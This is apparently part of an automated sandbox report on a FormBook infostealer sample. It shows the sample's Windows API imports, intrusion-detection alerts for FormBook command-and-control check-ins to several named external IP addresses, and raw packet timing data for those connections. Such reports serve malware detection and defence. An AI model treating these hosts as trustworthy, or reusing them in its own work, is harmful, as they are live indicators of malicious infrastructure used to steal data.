FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-13T13:07:23.267453+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 49822 | 38.47.233.21 | 80 | TCP
2024-12-13T13:07:23.267453+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49822 | 38.47.233.21 | 80 | TCP
2024-12-13T13:07:40.295192+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49858 | 172.67.137.47 | 80 | TCP
2024-12-13T13:07:42.951429+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49868 | 172.67.137.47 | 80 | TCP
2024-12-13T13:07:45.607692+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49874 | 172.67.137.47 | 80 | TCP
2024-12-13T13:07:48.401968+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 49880 | 172.67.137.47 | 80 | TCP
2024-12-13T13:07:48.401968+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49880 | 172.67.137.47 | 80 | TCP
2024-12-13T13:07:57.623567+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49902 | 206.238.89.119 | 80 | TCP
2024-12-13T13:08:00.279671+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49911 | 206.238.89.119 | 80 | TCP
2024-12-13T13:08:02.936016+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49918 | 206.238.89.119 | 80 | TCP
2024-12-13T13:08:05.631634+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 49924 | 206.238.89.119 | 80 | TCP
2024-12-13T13:08:05.631634+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49924 | 206.238.89.119 | 80 | TCP
2024-12-13T13:08:12.721564+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49941 | 66.29.149.46 | 80 | TCP
2024-12-13T13:08:15.375502+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49948 | 66.29.149.46 | 80 | TCP
2024-12-13T13:08:18.034708+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49955 | 66.29.149.46 | 80 | TCP
2024-12-13T13:08:20.715432+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 49961 | 66.29.149.46 | 80 | TCP
2024-12-13T13:08:20.715432+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49961 | 66.29.149.46 | 80 | TCP
2024-12-13T13:08:27.793769+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49978 | 217.70.184.50 | 80 | TCP
2024-12-13T13:08:30.458875+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49985 | 217.70.184.50 | 80 | TCP
2024-12-13T13:08:33.827966+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49989 | 217.70.184.50 | 80 | TCP
2024-12-13T13:08:36.422986+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 49990 | 217.70.184.50 | 80 | TCP
2024-12-13T13:08:36.422986+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49990 | 217.70.184.50 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 13, 2024 13:07:21.605407000 CET | 49822 | 80 | 192.168.2.7 | 38.47.233.21
Dec 13, 2024 13:07:21.725297928 CET | 80 | 49822 | 38.47.233.21 | 192.168.2.7
Dec 13, 2024 13:07:21.725411892 CET | 49822 | 80 | 192.168.2.7 | 38.47.233.21
Dec 13, 2024 13:07:21.733755112 CET | 49822 | 80 | 192.168.2.7 | 38.47.233.21
Dec 13, 2024 13:07:21.854259968 CET | 80 | 49822 | 38.47.233.21 | 192.168.2.7
Dec 13, 2024 13:07:23.265644073 CET | 80 | 49822 | 38.47.233.21 | 192.168.2.7
Dec 13, 2024 13:07:23.265805960 CET | 80 | 49822 | 38.47.233.21 | 192.168.2.7
Dec 13, 2024 13:07:23.267452955 CET | 49822 | 80 | 192.168.2.7 | 38.47.233.21
Dec 13, 2024 13:07:23.268572092 CET | 49822 | 80 | 192.168.2.7 | 38.47.233.21
Dec 13, 2024 13:07:23.388791084 CET | 80 | 49822 | 38.47.233.21 | 192.168.2.7
Dec 13, 2024 13:07:38.655781031 CET | 49858 | 80 | 192.168.2.7 | 172.67.137.47
Dec 13, 2024 13:07:38.775712013 CET | 80 | 49858 | 172.67.137.47 | 192.168.2.7
Dec 13, 2024 13:07:38.775800943 CET | 49858 | 80 | 192.168.2.7 | 172.67.137.47
Dec 13, 2024 13:07:38.787792921 CET | 49858 | 80 | 192.168.2.7 | 172.67.137.47
Dec 13, 2024 13:07:38.907581091 CET | 80 | 49858 | 172.67.137.47 | 192.168.2.7
Dec 13, 2024 13:07:40.295192003 CET | 49858 | 80 | 192.168.2.7 | 172.67.137.47
Dec 13, 2024 13:07:40.555041075 CET | 80 | 49858 | 172.67.137.47 | 192.168.2.7
Dec 13, 2024 13:07:40.555258036 CET | 49858 | 80 | 192.168.2.7 | 172.67.137.47
Dec 13, 2024 13:07:41.313827038 CET | 49868 | 80 | 192.168.2.7 | 172.67.137.47
Dec 13, 2024 13:07:41.433533907 CET | 80 | 49868 | 172.67.137.47 | 192.168.2.7
Dec 13, 2024 13:07:41.434132099 CET | 49868 | 80 | 192.168.2.7 | 172.67.137.47
Dec 13, 2024 13:07:41.447828054 CET | 49868 | 80 | 192.168.2.7 | 172.67.137.47
Dec 13, 2024 13:07:41.567944050 CET | 80 | 49868 | 172.67.137.47 | 192.168.2.7
Dec 13, 2024 13:07:42.951428890 CET | 49868 | 80 | 192.168.2.7 | 172.67.137.47
Dec 13, 2024 13:07:43.072848082 CET | 80 | 49868 | 172.67.137.47 | 192.168.2.7
Dec 13, 2024 13:07:43.072981119 CET | 49868 | 80 | 192.168.2.7 | 172.67.137.47
Dec 13, 2024 13:07:43.969871044 CET | 49874 | 80 | 192.168.2.7 | 172.67.137.47
Dec 13, 2024 13:07:44.089706898 CET | 80 | 49874 | 172.67.137.47 | 192.168.2.7
Dec 13, 2024 13:07:44.090003967 CET | 49874 | 80 | 192.168.2.7 | 172.67.137.47
Dec 13, 2024 13:07:44.101985931 CET | 49874 | 80 | 192.168.2.7 | 172.67.137.47
Dec 13, 2024 13:07:44.221996069 CET | 80 | 49874 | 172.67.137.47 | 192.168.2.7
Dec 13, 2024 13:07:44.222321033 CET | 80 | 49874 | 172.67.137.47 | 192.168.2.7
Dec 13, 2024 13:07:45.607692003 CET | 49874 | 80 | 192.168.2.7 | 172.67.137.47
Dec 13, 2024 13:07:45.726150036 CET | 80 | 49874 | 172.67.137.47 | 192.168.2.7
Dec 13, 2024 13:07:45.726161003 CET | 80 | 49874 | 172.67.137.47 | 192.168.2.7
Dec 13, 2024 13:07:45.726253986 CET | 49874 | 80 | 192.168.2.7 | 172.67.137.47
Dec 13, 2024 13:07:45.726253986 CET | 49874 | 80 | 192.168.2.7 | 172.67.137.47
Dec 13, 2024 13:07:45.727758884 CET | 80 | 49874 | 172.67.137.47 | 192.168.2.7
Dec 13, 2024 13:07:45.727830887 CET | 49874 | 80 | 192.168.2.7 | 172.67.137.47
Dec 13, 2024 13:07:46.625912905 CET | 49880 | 80 | 192.168.2.7 | 172.67.137.47
Dec 13, 2024 13:07:46.745795012 CET | 80 | 49880 | 172.67.137.47 | 192.168.2.7
Dec 13, 2024 13:07:46.745881081 CET | 49880 | 80 | 192.168.2.7 | 172.67.137.47
Dec 13, 2024 13:07:46.753331900 CET | 49880 | 80 | 192.168.2.7 | 172.67.137.47
                                                    Dec 13, 2024 13:07:46.873075962 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:48.401653051 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:48.401822090 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:48.401968002 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:48.942686081 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:48.942747116 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:48.942761898 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:48.942878008 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:48.942898989 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:48.942923069 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:48.942939043 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:48.942954063 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:48.942955971 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:48.942970037 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:48.942980051 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:48.943038940 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:48.943135023 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:48.951159954 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:48.951200008 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:48.951360941 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:48.959518909 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:48.959880114 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.062988997 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.063102961 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.063302994 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.134663105 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.134742975 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.134955883 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.136964083 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.137108088 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.137360096 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.145025015 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.145041943 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.145175934 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.153047085 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.153076887 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.153202057 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.160988092 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.161082029 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.161170006 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.168952942 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.169079065 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.169207096 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.176924944 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.177105904 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.177443027 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.184961081 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.185031891 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.185163975 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.192934990 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.193064928 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.193207026 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.200938940 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.201226950 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.201359987 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.208615065 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.208750963 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.208843946 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.216316938 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.216348886 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.216433048 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.223793983 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.223895073 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.223985910 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.255053043 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.310748100 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.326936007 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.327008963 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.327126980 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.329303980 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.329389095 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.329525948 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.334719896 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.334732056 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.334800959 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.339396954 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.339575052 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.339651108 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.341926098 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.461565971 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:55.980467081 CET4990280192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:07:56.100342989 CET8049902206.238.89.119192.168.2.7
                                                    Dec 13, 2024 13:07:56.100436926 CET4990280192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:07:56.117201090 CET4990280192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:07:56.237215042 CET8049902206.238.89.119192.168.2.7
                                                    Dec 13, 2024 13:07:57.623567104 CET4990280192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:07:57.651676893 CET8049902206.238.89.119192.168.2.7
                                                    Dec 13, 2024 13:07:57.651765108 CET4990280192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:07:57.651868105 CET8049902206.238.89.119192.168.2.7
                                                    Dec 13, 2024 13:07:57.652206898 CET4990280192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:07:57.743357897 CET8049902206.238.89.119192.168.2.7
                                                    Dec 13, 2024 13:07:57.743428946 CET4990280192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:07:58.641510963 CET4991180192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:07:58.761349916 CET8049911206.238.89.119192.168.2.7
                                                    Dec 13, 2024 13:07:58.761452913 CET4991180192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:07:58.773279905 CET4991180192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:07:58.893419981 CET8049911206.238.89.119192.168.2.7
                                                    Dec 13, 2024 13:08:00.279670954 CET4991180192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:08:00.326000929 CET8049911206.238.89.119192.168.2.7
                                                    Dec 13, 2024 13:08:00.326114893 CET8049911206.238.89.119192.168.2.7
                                                    Dec 13, 2024 13:08:00.326145887 CET4991180192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:08:00.326180935 CET4991180192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:08:00.399882078 CET8049911206.238.89.119192.168.2.7
                                                    Dec 13, 2024 13:08:00.400330067 CET4991180192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:08:01.300612926 CET4991880192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:08:01.420489073 CET8049918206.238.89.119192.168.2.7
                                                    Dec 13, 2024 13:08:01.420624971 CET4991880192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:08:01.432712078 CET4991880192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:08:01.552607059 CET8049918206.238.89.119192.168.2.7
                                                    Dec 13, 2024 13:08:01.552650928 CET8049918206.238.89.119192.168.2.7
                                                    Dec 13, 2024 13:08:02.936016083 CET4991880192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:08:02.988624096 CET8049918206.238.89.119192.168.2.7
                                                    Dec 13, 2024 13:08:02.988776922 CET4991880192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:08:03.056107044 CET8049918206.238.89.119192.168.2.7
                                                    Dec 13, 2024 13:08:03.056720972 CET4991880192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:08:03.954096079 CET4992480192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:08:04.073925018 CET8049924206.238.89.119192.168.2.7
                                                    Dec 13, 2024 13:08:04.074079037 CET4992480192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:08:04.086200953 CET4992480192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:08:04.206757069 CET8049924206.238.89.119192.168.2.7
                                                    Dec 13, 2024 13:08:05.631333113 CET8049924206.238.89.119192.168.2.7
                                                    Dec 13, 2024 13:08:05.631572962 CET8049924206.238.89.119192.168.2.7
                                                    Dec 13, 2024 13:08:05.631633997 CET4992480192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:08:05.633819103 CET4992480192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:08:05.755373955 CET8049924206.238.89.119192.168.2.7
                                                    Dec 13, 2024 13:08:11.354545116 CET4994180192.168.2.766.29.149.46
                                                    Dec 13, 2024 13:08:11.474343061 CET804994166.29.149.46192.168.2.7
                                                    Dec 13, 2024 13:08:11.474438906 CET4994180192.168.2.766.29.149.46
                                                    Dec 13, 2024 13:08:11.486176968 CET4994180192.168.2.766.29.149.46
                                                    Dec 13, 2024 13:08:11.606041908 CET804994166.29.149.46192.168.2.7
                                                    Dec 13, 2024 13:08:12.719862938 CET804994166.29.149.46192.168.2.7
                                                    Dec 13, 2024 13:08:12.721487999 CET804994166.29.149.46192.168.2.7
                                                    Dec 13, 2024 13:08:12.721564054 CET4994180192.168.2.766.29.149.46
                                                    Dec 13, 2024 13:08:12.998493910 CET4994180192.168.2.766.29.149.46
                                                    Dec 13, 2024 13:08:14.019423008 CET4994880192.168.2.766.29.149.46
                                                    Dec 13, 2024 13:08:14.139127016 CET804994866.29.149.46192.168.2.7
                                                    Dec 13, 2024 13:08:14.139266014 CET4994880192.168.2.766.29.149.46
                                                    Dec 13, 2024 13:08:14.151283979 CET4994880192.168.2.766.29.149.46
                                                    Dec 13, 2024 13:08:14.270999908 CET804994866.29.149.46192.168.2.7
                                                    Dec 13, 2024 13:08:15.375128031 CET804994866.29.149.46192.168.2.7
                                                    Dec 13, 2024 13:08:15.375247955 CET804994866.29.149.46192.168.2.7
                                                    Dec 13, 2024 13:08:15.375502110 CET4994880192.168.2.766.29.149.46
                                                    Dec 13, 2024 13:08:15.655529976 CET4994880192.168.2.766.29.149.46
                                                    Dec 13, 2024 13:08:16.677755117 CET4995580192.168.2.766.29.149.46
                                                    Dec 13, 2024 13:08:16.798520088 CET804995566.29.149.46192.168.2.7
                                                    Dec 13, 2024 13:08:16.798608065 CET4995580192.168.2.766.29.149.46
                                                    Dec 13, 2024 13:08:16.825684071 CET4995580192.168.2.766.29.149.46
                                                    Dec 13, 2024 13:08:16.947514057 CET804995566.29.149.46192.168.2.7
                                                    Dec 13, 2024 13:08:16.947530985 CET804995566.29.149.46192.168.2.7
                                                    Dec 13, 2024 13:08:18.034415007 CET804995566.29.149.46192.168.2.7
                                                    Dec 13, 2024 13:08:18.034531116 CET804995566.29.149.46192.168.2.7
                                                    Dec 13, 2024 13:08:18.034708023 CET4995580192.168.2.766.29.149.46
                                                    Dec 13, 2024 13:08:18.342223883 CET4995580192.168.2.766.29.149.46
                                                    Dec 13, 2024 13:08:19.363480091 CET4996180192.168.2.766.29.149.46
                                                    Dec 13, 2024 13:08:19.483248949 CET804996166.29.149.46192.168.2.7
                                                    Dec 13, 2024 13:08:19.483414888 CET4996180192.168.2.766.29.149.46
                                                    Dec 13, 2024 13:08:19.564925909 CET4996180192.168.2.766.29.149.46
                                                    Dec 13, 2024 13:08:19.684798956 CET804996166.29.149.46192.168.2.7
                                                    Dec 13, 2024 13:08:20.715131044 CET804996166.29.149.46192.168.2.7
                                                    Dec 13, 2024 13:08:20.715379000 CET804996166.29.149.46192.168.2.7
                                                    Dec 13, 2024 13:08:20.715431929 CET4996180192.168.2.766.29.149.46
                                                    Dec 13, 2024 13:08:20.717715979 CET4996180192.168.2.766.29.149.46
